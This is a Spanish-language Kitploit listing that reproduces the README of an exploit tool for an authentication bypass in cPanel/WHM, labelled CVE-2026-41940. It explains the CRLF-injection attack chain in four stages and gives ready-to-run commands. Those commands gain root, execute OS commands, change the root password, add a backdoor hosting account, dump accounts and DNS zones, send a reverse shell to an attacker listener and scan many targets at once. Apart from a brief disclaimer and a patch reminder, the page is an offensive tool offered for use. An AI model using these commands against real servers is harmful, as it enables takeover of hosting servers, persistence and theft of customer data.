Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-41940 — Bypass de autenticación en cPanel/WHM (Vulnerabilidad de día cero) | Kitploit
Herramientas/GitHubGitHub/0xyur1/cve-2026-41940
Autenticación y AutorizaciónEscáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPost-ExplotaciónSeguridad WebPruebas de PenetraciónAutenticaciónRed Teaming
GitHub0xyur1/cve-2026-41940

CVE-2026-41940

Bypass de autenticación en cPanel/WHM (Vulnerabilidad de día cero)

102hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio

CVE-2026-41940: Omisión de Autenticación en cPanel/WHM (Objetivo Único y Múltiple)

Aviso legal: Este documento y el script asociado (exploit.py) se proporcionan estrictamente con fines educativos, investigación de seguridad y pruebas de penetración autorizadas. No utilice este software contra sistemas que no sean de su propiedad o para los que no tenga permiso explícito de prueba.

Descripción general

exploit.py es un script que demuestra una vulnerabilidad de omisión de autenticación (CVE-2026-41940) en cPanel y WHM. La vulnerabilidad permite a un atacante no autenticado inyectar una sesión root en la caché del demonio mediante una falla de inyección CRLF, logrando en última instancia acceso a nivel root en WHM sin necesidad de credenciales válidas.

Análisis de la vulnerabilidad y flujo del exploit

El exploit funciona aprovechando una vulnerabilidad de inyección CRLF (Retorno de Carro y Salto de Línea) dentro del mecanismo de manejo de autenticación Basic, combinada con una falla de propagación de sesión. El script automatiza el ataque en cuatro etapas:

  1. Acuñación de sesión previa a la autenticación: Se conecta a endpoints públicos de inicio de sesión (p. ej., /login/ o /cgi/login.cgi) para obtener una cookie de sesión base no autenticada (whostmgrsession).
  2. Inyección CRLF: Envía un encabezado de autenticación Basic manipulado que contiene una carga útil codificada en Base64 que inyecta campos de sesión root directamente en la caché de sesiones de cpsrvd. La respuesta de redirección del servidor filtra el token de seguridad generado (cpsess).
  3. Propagación de la sesión: La cookie de sesión cruda se envía a un endpoint autenticado de WHM, lo que provoca que do_token_denied propague la sesión falsificada en la caché del demonio, convirtiéndola en una sesión autenticada válida.
  4. Verificación: Accede a endpoints restringidos de la API de WHM (p. ej., /json-api/version) utilizando la sesión falsificada para confirmar el acceso a nivel root.

Requisitos previos

  • Python 3.x
  • Librería requests
root@kitploit:~
pip install requests

Uso

root@kitploit:~
python exploit.py --target <URL> [opciones]
python exploit.py --target-file <ARCHIVO> [opciones]

Argumentos

Selección de objetivo

ArgumentoDescripción
--target URLURL única de WHM (p. ej., https://target:2087)
--target-file ARCHIVOArchivo con objetivos (un ip:puerto por línea) — habilita automáticamente el modo de verificación

Opciones de red y núcleo

Opciones de explotación (posterior a la omisión)

Opciones de salida

ArgumentoDescripción
--output ARCHIVOGuardar el token de sesión y los detalles en un archivo JSON

Ejemplos

root@kitploit:~
# Comprobar si el objetivo es vulnerable
python exploit.py --target https://target:2087 --check

# Volcar información del servidor (versión, cuentas, privilegios)
python exploit.py --target https://target:2087 --dump

# Generar una URL de inicio de sesión root de un solo clic (péguela en el navegador de inmediato)
python exploit.py --target https://target:2087 --session

# Ejecutar un comando
python exploit.py --target https://target:2087 --exec "id"

# Abrir un shell interactivo de WHM
python exploit.py --target https://target:2087 --shell

# Cambiar la contraseña root
python exploit.py --target https://target:2087 --password 'NewP@ss!'

# Llamar directamente a la API de WHM
python exploit.py --target https://target:2087 --api version
python exploit.py --target https://target:2087 --api listaccts --api-params api.version=1

# Crear una cuenta de cPanel como puerta trasera
python exploit.py --target https://target:2087 --add-user myuser 'Pass123!' example.com

# Enviar una reverse shell
python exploit.py --target https://target:2087 --revshell YOUR_IP 4444

# Sobrescribir el nombre de host (úselo cuando el descubrimiento automático falle)
python exploit.py --target https://1.2.3.4:2087 --hostname whm.server.net --check

# Escanear múltiples objetivos (modo solo verificación)
python exploit.py --target-file ips.txt
python exploit.py --target-file ips.txt --threads 20

# Guardar la sesión en un archivo
python exploit.py --target https://target:2087 --dump --output results.json

Comandos del shell interactivo

Al usar --shell, están disponibles los siguientes comandos:


Recordatorio

Aplique inmediatamente los últimos parches de seguridad de cPanel/WHM.

Descargar herramienta
ArgumentoDescripción
--threads NHilos concurrentes para el modo multiobjetivo (predeterminado: 10)
--hostname HOSTSobrescribir el encabezado Host — úselo cuando el descubrimiento automático falle o proporcione un nombre de host incorrecto
--timeout NTiempo de espera por solicitud en segundos (predeterminado: 15)
--retries NNúmero de reintentos en errores de red (predeterminado: 3)
--cookie-name NOMBREForzar un nombre específico de cookie de sesión (se detecta automáticamente si se omite)
--no-verifyOmitir la verificación de la Etapa 4 y continuar de todos modos
ArgumentoDescripción
--checkModo solo verificación — comprobar la vulnerabilidad sin explotar (se activa automáticamente con --target-file)
--password PASSCambiar la contraseña root a PASS
--api FUNCLlamar a una función específica de la API JSON de WHM
--api-params K=V,...Parámetros separados por comas para --api
--exec CMDEjecutar un comando del sistema operativo mediante el scripts/run_script de WHM (respaldo: rawexec)
--sessionGenerar una URL de inicio de sesión root de un solo clic — ábrala inmediatamente, el token expira rápido
--shellAbrir un shell interactivo de WHM (solo objetivo único)
--dumpVolcar información del servidor: versión, cuentas, zonas DNS, privilegios
--add-user USER PASS DOMAINCrear una nueva cuenta de alojamiento cPanel
--revshell LHOST LPORTEnviar una reverse shell bash a su listener
ComandoDescripción
api <función> [k=v ...]Llamar a una función de la API JSON de WHM (p. ej., api version)
exec <comando>Ejecutar un comando del sistema operativo mediante WHM (p. ej., exec id)
passwd <nuevapass>Cambiar la contraseña root
dumpVolcar información del servidor
revshell <lhost> <lport>Enviar una reverse shell
add <usuario> <pass> <dominio>Crear una cuenta de cPanel
save <ruta>Guardar la sesión actual en un archivo
exit / quitSalir del shell